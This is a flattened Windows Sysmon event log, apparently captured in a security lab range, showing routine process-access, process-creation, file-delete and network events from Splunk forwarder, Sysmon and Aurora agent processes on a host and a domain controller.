12:17:29.190{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015208Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.190{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015207Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.190{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015206Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.190{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015205Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.190{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015204Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.190{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015203Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.190{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E359-63C7-E001-00000000B002}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000015202Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.190{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E359-63C7-E001-00000000B002}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000015201Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.190{E5A8D418-E359-63C7-E001-00000000B002}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000039935Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:29.887{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E359-63C7-0206-00000000AF02}420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039934Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:29.887{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039933Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:29.887{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039932Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:29.887{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039931Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:29.887{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039930Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:29.887{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E359-63C7-0206-00000000AF02}420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000039929Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:29.887{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E359-63C7-0206-00000000AF02}420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000039928Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:29.887{FE4C2B44-E359-63C7-0206-00000000AF02}420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000039927Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:29.387{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D033ABF78E2A3E0BE6E3FDCBFC5539CE,SHA256=D6FB67044AB90E56E0C7A4F9AD3551EC04F0CD23B177F5549746096A438AA1CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039926Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:29.219{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E359-63C7-0106-00000000AF02}5796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039925Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:29.219{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E359-63C7-0106-00000000AF02}5796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039924Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:29.219{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E359-63C7-0106-00000000AF02}5796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039923Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:29.218{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E359-63C7-0106-00000000AF02}5796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039922Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:29.218{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E359-63C7-0106-00000000AF02}5796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039921Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:29.218{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E359-63C7-0106-00000000AF02}5796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 354300x800000000000000039920Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:26.944{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56229-false10.0.1.12-8089- 10341000x800000000000000039919Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:29.100{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E359-63C7-0106-00000000AF02}5796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039918Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:29.100{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039917Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:29.100{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039916Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 